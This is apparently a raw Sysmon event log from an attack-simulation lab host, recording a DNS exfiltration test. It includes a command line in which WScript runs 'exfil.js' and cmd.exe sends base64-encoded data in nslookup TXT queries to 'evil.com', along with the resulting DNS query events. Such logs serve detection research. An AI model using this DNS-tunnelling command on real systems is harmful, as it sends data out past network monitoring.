14:16:42.938{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.938{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.938{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.938{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.938{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-BA41-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.938{2E1864BB-17CA-629A-B841-000000005F02}78641524C:\Windows\system32\cmd.exe{2E1864BB-17CA-629A-BA41-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.947{2E1864BB-17CA-629A-BA41-000000005F02}3396C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CA-629A-B841-000000005F02}7864C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljsfkimr.tmp 2>&1 10341000x8000000000000000203609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.906{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-B941-000000005F02}5828C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.906{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-B941-000000005F02}5828C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.906{2E1864BB-17CA-629A-B941-000000005F02}58285012C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-B841-000000005F02}7864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.875{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-B941-000000005F02}5828C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000203605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.685{00000000-0000-0000-0000-000000000000}7080<unknown process>-udpfalsefalse127.0.0.1-53009-false127.0.0.1-53domain 354300x8000000000000000203604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.685{00000000-0000-0000-0000-000000000000}7080<unknown process>-udptruefalse127.0.0.1-53009-false127.0.0.1-53domain 10341000x8000000000000000203603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.875{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.684{00000000-0000-0000-0000-000000000000}7080<unknown process>-udpfalsefalse127.0.0.1-53008-false127.0.0.1-53domain 10341000x8000000000000000203601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.875{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.875{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.684{00000000-0000-0000-0000-000000000000}7080<unknown process>-udptruefalse127.0.0.1-53008-false127.0.0.1-53domain 10341000x8000000000000000203598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.875{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.875{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-B841-000000005F02}7864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000203596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.683{00000000-0000-0000-0000-000000000000}7080<unknown process>-udpfalsefalse127.0.0.1-53007-false127.0.0.1-53domain 10341000x8000000000000000203595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.875{2E1864BB-17A1-629A-783D-000000005F02}55523840C:\Windows\System32\WScript.exe{2E1864BB-17CA-629A-B841-000000005F02}7864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.878{2E1864BB-17CA-629A-B841-000000005F02}7864C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljsfkimr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000203593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.683{00000000-0000-0000-0000-000000000000}7080<unknown process>-udptruefalse127.0.0.1-53007-false127.0.0.1-53domain 354300x8000000000000000203592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.536{00000000-0000-0000-0000-000000000000}300<unknown process>-udpfalsefalse127.0.0.1-53006-false127.0.0.1-53domain 354300x8000000000000000203591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.535{00000000-0000-0000-0000-000000000000}300<unknown process>-udptruefalse127.0.0.1-53006-false127.0.0.1-53domain 354300x8000000000000000203590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.535{00000000-0000-0000-0000-000000000000}300<unknown process>-udpfalsefalse127.0.0.1-53005-false127.0.0.1-53domain 354300x8000000000000000203589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.535{00000000-0000-0000-0000-000000000000}300<unknown process>-udptruefalse127.0.0.1-53005-false127.0.0.1-53domain 354300x8000000000000000203588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.535{00000000-0000-0000-0000-000000000000}300<unknown process>-udpfalsefalse127.0.0.1-53004-false127.0.0.1-53domain 354300x8000000000000000203587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.534{00000000-0000-0000-0000-000000000000}300<unknown process>-udptruefalse127.0.0.1-53004-false127.0.0.1-53domain 23542300x8000000000000000203586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.859{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlazqdd.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000203585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.334{00000000-0000-0000-0000-000000000000}5740evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.253{00000000-0000-0000-0000-000000000000}7824evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.130{00000000-0000-0000-0000-000000000000}2668evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.018{00000000-0000-0000-0000-000000000000}5060evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.903{00000000-0000-0000-0000-000000000000}6520evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.812{00000000-0000-0000-0000-000000000000}2616evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.684{00000000-0000-0000-0000-000000000000}7080evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.533{00000000-0000-0000-0000-000000000000}300evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000203577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.822{2E1864BB-17CA-629A-B641-000000005F02}20606584C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-B741-000000005F02}7320C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.806{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.806{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.806{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.806{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.806{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-B741-000000005F02}7320C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.806{2E1864BB-17CA-629A-B541-000000005F02}8104488C:\Windows\system32\cmd.exe{2E1864BB-17CA-629A-B741-000000005F02}7320C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 